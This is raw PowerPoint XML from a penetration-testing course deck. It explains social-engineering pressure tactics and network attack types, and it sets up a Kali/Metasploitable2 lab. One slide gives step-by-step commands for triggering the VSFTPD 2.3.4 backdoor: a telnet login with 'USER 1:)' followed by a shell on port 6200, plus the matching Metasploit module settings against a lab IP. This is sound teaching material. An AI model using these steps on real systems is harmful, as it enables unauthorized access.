              <a:t>4. Urgency and Authority: humans are people pleasers by nature. We want people to like us and/or believe we will receive something of equal or better value for our labors, a "quid pro quo", whether promised, implied or imagined. Therefore, we will go out of our way to accommodate requests, often with more urgency to complete the task and receive our reward than thinking through the reason for the request and resulting implications of completing said task. Especially if the task seems to come from a figure of authority such as a boss, important client, government entity, financial institution, etc. No one wants to disappoint the boss, lose a valued client or find themselves in trouble with the bank or IRS so there is a tendency to act first and ask questions later.</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a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>5. Intimidation: overt or implied threats if demands are not met. These are things like pop-ups that occur warning if you do not call this number, all computer contents will be lost. Gasp! Ring... Many include pressure-inducing features such as flashing lights and siren-type sounds to further disorient already shocked (and often non-tech savvy) people who will willingly call right away just to make it STOP. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is another intimidation tactic. Hackers will lock a User out of a device demanding payment for returning access</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pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>6. Scarcity: nothing makes people act faster than thinking they might lose out on something valuable they want. We see it all the time on television, in print ads, and online marketing. "Limited quantity available", "Extra discount for the first 50 buyers", "One-day sale"...the list goes on and on. Why is this pressure tactic so commonly used? Because it WORKS.</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32</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9" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="190500" y="2536930"/>
            <a:ext cx="8761413" cy="22098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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Name resolution exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NETBIOS name service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This service is often called WINS on Windows systems. The NetBIOS Name Service (NBNS) is part of the NetBIOS-over-TCP protocol suite. NBNS serves much the same purpose as DNS does which is to translate human-readable names to IP addresses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>LLMNR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>LLMNR (Link-Local Multicast Name Resolution) is a protocol based on the Domain Name System packet format that allows both IPv4 and IPv6 hosts to perform name resolution for hosts on the same local link.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also see DNS and ARP poisoning or spoofing.</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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SMB exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server Message Block (SMB) is the transport protocol used by Windows machines for a wide variety of purposes such as file sharing, printer sharing, and access to remote Windows services. SMB operates over TCP ports 139 and 445. Examples include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>EternalBlue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WannaCry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SNMP exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SNMP (Simple Network Management Protocol ) has three versions. Version 1 or SNMPv1, has very poor security. The authentication of clients is in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cleartext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and by default, uses a "community string" that is set to "public". This community string operates like a password and it is valid for each and every node on the network.</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1190423"/>
            <a:ext cx="8229600" cy="3394472"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SMTP exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SMTP (Simple Mail Transfer Protocol) is an Internet standard for electronic mail transmission.  Direct exploits, open relay, local relay, phishing,  SPAM, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FTP exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FTP (File Transfer Protocol) ,by itself, is not a secure protocol and it has a lot of security vulnerabilities. It is known that FTP does not provide any encryption for data transfer and usernames and passwords are transmitted in clear text.</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VSFTPD and other exploits in MetaSpoitable2</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37</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An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> scan of MetaSploitable2 shows port 21 is open and running a vulnerable version of VSFTPD.  This version has a back door…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>telnet 192.168.13.251 21</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then issues these commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>USER 1:)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PASS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pass</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -p 6200 192.168.13.251 shows back door port is open.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>telnet 192.168.13.251 6200</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then issue commands such as (note need to end with semicolon (;) ):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>id;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>;</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38</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Demo – Basic Command Reference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This vulnerability can also be exploited using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Run the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Framework from the Exploitation Tools menu of Kali.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This will set up the initial database and environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then bring of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt; command prompt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Issue the following at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt; prompt:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>use exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/ftp/vsftpd_234_backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>set RHOST 192.168.13.251</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This will run the exploit and present the backdoor prompt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>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a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns=""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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DNS cache poisoning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4100" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2190750" y="1787375"/>
            <a:ext cx="4762500" cy="26193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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pass the hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A pass the hash attack is an NT LAN Manager (NTLM)-based technique in which an attacker steals a hashed user credential and, without cracking it, reuses it to trick a Windows-based authentication system into creating a new authenticated session on the same network.</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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Man-in-the-middle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ARP spoofing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2190750" y="2029763"/>
            <a:ext cx="4762500" cy="25431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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Man-in-the-middle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Replay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A replay attack (also known as playback attack) is a form of network attack in which a valid data transmission is maliciously or fraudulently repeated or delayed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Relay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A relay attack in computer security is a type of hacking technique related to man-in-the-middle and replay attacks. In a classic man-in-the-middle attack, an attacker intercepts and manipulates communications between two parties initiated by one of the parties.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SSL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Secure Sockets Layer) stripping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>- is a technique by which a website is downgraded from https to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Downgrade - Can be like above or with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, encryption, etc.</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Attacks and Exploits – Domain 3.2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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (Denial of Service)/stress test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An attack that denies a resource or service to an entity that would need it. Also can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (Distributed Denial of Service) attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NAC (Network Access Control) bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>VLAN (Virtual Local Area Network) hopping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>VLAN hopping is a method of attacking networked resources on a virtual LAN (VLAN). The basic concept behind all VLAN hopping attacks is for an attacking host on a VLAN to gain access to traffic on other VLANs that would normally not be accessible.</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Recreate the spear phishing demo from this class.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Recreate the VSFTPD exploit demo from the class.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attempt to exploit at least one more vulnerability in Metasploitable2.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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45</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Attacks and Exploits II - Domains 3.3 and 3.4.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploit Wireless and RF-based vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploit application-based vulnerabilities:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL Injection demo with SQL Map</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Basic File and Command injection demos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We will be using 2 of the provided VM’s. In particular the Kali Linux and Metasploitable2 VMs will be used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>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46</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a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{30934BE8-FA3C-435A-807A-87738D7D79F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2066355A-084C-D24E-9AD2-7E4FC41EA627}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A picture containing clipart&#10;&#10;Description generated with very high confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns=""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Social engineering &amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attack types</a:t>
            </a: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a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns=""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a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{392274BE-9EA5-4C31-A5F4-AF666394746A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603971"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3" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{392274BE-9EA5-4C31-A5F4-AF666394746A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620179" y="259437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4" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{392274BE-9EA5-4C31-A5F4-AF666394746A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="626659" y="3077531"/>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15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{392274BE-9EA5-4C31-A5F4-AF666394746A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="613683" y="3482859"/>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p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns=""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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns=""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Where are you still having issues?  Please choose 1, lowest level that applies.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Getting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>VirtualBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> installed and running.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Importing the .ova files into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>VirtualBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Running the provided </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>VirtualBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> VMs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No issues, I’ve got it all running now, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Yay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>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p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns=""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3606</TotalTime>
  <Words>3162</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>337</Paragraphs>
  <Slides>47</Slides>
  <Notes>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vt:lpstr>
      <vt:lpstr>POLL – ANSWER SLIDE</vt:lpstr>
      <vt:lpstr>POLL</vt:lpstr>
      <vt:lpstr>POLL – ANSWER SLIDE</vt:lpstr>
      <vt:lpstr>POLL</vt:lpstr>
      <vt:lpstr>POLL – ANSWER SLIDE</vt:lpstr>
